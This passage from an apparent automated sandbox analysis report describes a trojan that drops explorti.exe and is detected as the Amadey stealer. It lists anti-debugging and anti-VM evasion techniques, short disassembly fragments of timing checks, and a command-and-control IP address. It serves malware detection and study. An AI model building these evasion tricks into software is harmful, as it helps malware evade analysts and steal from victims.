Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DC0CE4 second address: 4DC0CF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov dx, FB72h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 mov dl, ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DC0CF6 second address: 4DC0D01 instructions: 0x00000000 rdtsc 0x00000002 movsx edx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 mov ebx, esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DC0D01 second address: 4DC0D1E instructions: 0x00000000 rdtsc 0x00000002 mov ah, 44h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FABC9471C2Fh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DC0D1E second address: 4DC0D3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD769h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DC0D3B second address: 4DC0D57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DC0D57 second address: 4DC0D76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007FABC90CD769h 0x00000009 pop eax 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: E8F20C second address: E8F213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 1015517 second address: 1015544 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edx 0x00000006 pop edx 0x00000007 jmp 00007FABC90CD763h 0x0000000c js 00007FABC90CD756h 0x00000012 jmp 00007FABC90CD75Ch 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 10156A3 second address: 10156A8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 10156A8 second address: 10156AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 1015823 second address: 101583E instructions: 0x00000000 rdtsc 0x00000002 jp 00007FABC9471C2Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jg 00007FABC9471C2Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 10159F3 second address: 10159F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 10159F9 second address: 10159FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 10159FD second address: 1015A28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD766h 0x00000007 jng 00007FABC90CD756h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 ja 00007FABC90CD756h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 1019951 second address: 1019983 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FABC9471C28h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007FABC9471C31h 0x00000018 jmp 00007FABC9471C2Dh 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 1019983 second address: 10199AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD766h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007FABC90CD75Ch 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 10199AD second address: 10199D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jl 00007FABC9471C34h 0x00000013 push eax 0x00000014 push edx 0x00000015 jnp 00007FABC9471C26h 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 1019A17 second address: 1019A4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FABC90CD756h 0x0000000a popad 0x0000000b pop ebx 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 mov edx, 2F208977h 0x00000016 push 1DD728BDh 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e jmp 00007FABC90CD768h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 1019A4F second address: 1019A54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 1019B78 second address: 1019B7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 1019D44 second address: 1019D4E instructions: 0x00000000 rdtsc 0x00000002 ja 00007FABC9471C2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 1019D4E second address: 1019D80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jbe 00007FABC90CD75Ah 0x0000000d nop 0x0000000e xor si, 11A6h 0x00000013 push 00000000h 0x00000015 mov ecx, dword ptr [ebp+122D2D00h] 0x0000001b mov edi, dword ptr [ebp+122D38B9h] 0x00000021 call 00007FABC90CD759h 0x00000026 pushad 0x00000027 push edi 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 1019D80 second address: 1019DB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jg 00007FABC9471C26h 0x0000000c jbe 00007FABC9471C26h 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 jmp 00007FABC9471C34h 0x0000001a mov eax, dword ptr [esp+04h] 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 1019DB2 second address: 1019DB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 1019DB6 second address: 1019DBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 1019DBA second address: 1019DDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FABC90CD760h 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e pushad 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pop edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 1019DDB second address: 1019DEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 1019DEC second address: 1019DF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 1019DF3 second address: 1019E63 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jno 00007FABC9471C26h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d mov dword ptr [ebp+122D3901h], esi 0x00000013 push 00000003h 0x00000015 mov ecx, 18BB6F0Ch 0x0000001a pushad 0x0000001b mov dword ptr [ebp+122D1D1Bh], ebx 0x00000021 movzx edx, ax 0x00000024 popad 0x00000025 push 00000000h 0x00000027 jnp 00007FABC9471C2Ch 0x0000002d push 00000003h 0x0000002f push 00000000h 0x00000031 push ebp 0x00000032 call 00007FABC9471C28h 0x00000037 pop ebp 0x00000038 mov dword ptr [esp+04h], ebp 0x0000003c add dword ptr [esp+04h], 0000001Ch 0x00000044 inc ebp 0x00000045 push ebp 0x00000046 ret 0x00000047 pop ebp 0x00000048 ret 0x00000049 and edi, dword ptr [ebp+122D2CF4h] 0x0000004f mov edi, dword ptr [ebp+122D2C30h] 0x00000055 push C75AB2FCh 0x0000005a push eax 0x0000005b push edx 0x0000005c push ebx 0x0000005d push edi 0x0000005e pop edi 0x0000005f pop ebx 0x00000060 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 1019E63 second address: 1019EAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 075AB2FCh 0x0000000f jnc 00007FABC90CD75Ch 0x00000015 lea ebx, dword ptr [ebp+1245E895h] 0x0000001b mov edi, dword ptr [ebp+122D3465h] 0x00000021 jmp 00007FABC90CD75Ah 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FABC90CD764h 0x0000002e rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 1019EAB second address: 1019EB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FABC9471C26h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 103A28E second address: 103A29D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edi 0x00000006 push edx 0x00000007 jbe 00007FABC90CD75Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 100BF5F second address: 100BF84 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C2Eh 0x00000007 ja 00007FABC9471C2Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 100BF84 second address: 100BFA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007FABC90CD764h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: 100BFA0 second address: 100BFBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FABC9471C39h 0x0000000a rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Special instruction interceptor: First address: 96EA2A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Special instruction interceptor: First address: B47B78 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Special instruction interceptor: First address: B30931 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Special instruction interceptor: First address: BA5C30 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Special instruction interceptor: First address: E8EA2A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Special instruction interceptor: First address: 1067B78 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Special instruction interceptor: First address: 1050931 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Special instruction interceptor: First address: 10C5C30 instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Code function: 0_2_04E20BA6 rdtsc 0_2_04E20BA6
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread delayed: delay time: 180000 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window / User API: threadDelayed 690 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window / User API: threadDelayed 390 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window / User API: threadDelayed 653 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window / User API: threadDelayed 689 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window / User API: threadDelayed 723 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window / User API: threadDelayed 3664 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 5556 Thread sleep count: 36 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 5556 Thread sleep time: -72036s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 1160 Thread sleep count: 690 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 1160 Thread sleep time: -1380690s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 964 Thread sleep count: 390 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 964 Thread sleep time: -11700000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 1840 Thread sleep time: -540000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 1548 Thread sleep count: 653 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 1548 Thread sleep time: -1306653s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 3508 Thread sleep count: 689 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 3508 Thread sleep time: -1378689s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 3580 Thread sleep count: 723 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 3580 Thread sleep time: -1446723s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 3508 Thread sleep count: 3664 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 3508 Thread sleep time: -7331664s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread delayed: delay time: 180000 Jump to behavior
Source: explorti.exe, explorti.exe, 00000008.00000002.1972526106.0000000001020000.00000040.00000001.01000000.00000008.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: explorti.exe, 00000002.00000003.3388620641.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000002.00000002.3856846494.0000000001372000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000002.00000003.3071340441.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000002.00000002.3856846494.00000000013B0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe, 00000000.00000002.1468928029.0000000000B00000.00000040.00000001.01000000.00000003.sdmp, explorti.exe, 00000002.00000002.3855716618.0000000001020000.00000040.00000001.01000000.00000008.sdmp, explorti.exe, 00000008.00000002.1972526106.0000000001020000.00000040.00000001.01000000.00000008.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: explorti.exe, 00000002.00000003.3388620641.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000002.00000003.3071340441.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000002.00000002.3856846494.00000000013B0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW?
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread information set: HideFromDebugger Jump to behavior
Potentially malicious time measurement code found
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Code function: 0_2_04E20938 Start: 04E20942 End: 04E2094C 0_2_04E20938
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Code function: 0_2_04E20BA6 rdtsc 0_2_04E20BA6
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 2_2_00E5645B mov eax, dword ptr fs:[00000030h] 2_2_00E5645B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 2_2_00E5A1C2 mov eax, dword ptr fs:[00000030h] 2_2_00E5A1C2
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe" Jump to behavior
Source: explorti.exe, explorti.exe, 00000008.00000002.1972526106.0000000001020000.00000040.00000001.01000000.00000008.sdmp Binary or memory string: KProgram Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 2_2_00E3D312 cpuid 2_2_00E3D312
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 2_2_00E3CB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 2_2_00E3CB1A

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 2.2.explorti.exe.e20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorti.exe.e20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe.900000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000003.1931905598.0000000004E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.3855298883.0000000000E21000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1468832489.0000000000901000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1972443019.0000000000E21000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1428535322.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1474858730.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1483011 Sample: SecuriteInfo.com.Win32.Troj... Startdate: 26/07/2024 Architecture: WINDOWS Score: 100 22 Found malware configuration 2->22 24 Antivirus detection for URL or domain 2->24 26 Antivirus / Scanner detection for submitted sample 2->26 28 5 other signatures 2->28 6 SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe 5 2->6         started        10 explorti.exe 2->10         started        process3 file4 16 C:\Users\user\AppData\Local\...\explorti.exe, PE32 6->16 dropped 18 C:\Users\...\explorti.exe:Zone.Identifier, ASCII 6->18 dropped 30 Detected unpacking (changes PE section rights) 6->30 32 Tries to evade debugger and weak emulator (self modifying code) 6->32 34 Tries to detect virtualization through RDTSC time measurements 6->34 36 Potentially malicious time measurement code found 6->36 12 explorti.exe 12 6->12         started        38 Hides threads from debuggers 10->38 40 Tries to detect sandboxes / dynamic malware analysis system (registry check) 10->40 42 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 10->42 signatures5 process6 dnsIp7 20 185.215.113.19, 49704, 49705, 49706 WHOLESALECONNECTIONSNL Portugal 12->20 44 Antivirus detection for dropped file 12->44 46 Detected unpacking (changes PE section rights) 12->46 48 Tries to detect sandboxes and other dynamic analysis tools (window names) 12->48 50 6 other signatures 12->50 signatures8
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
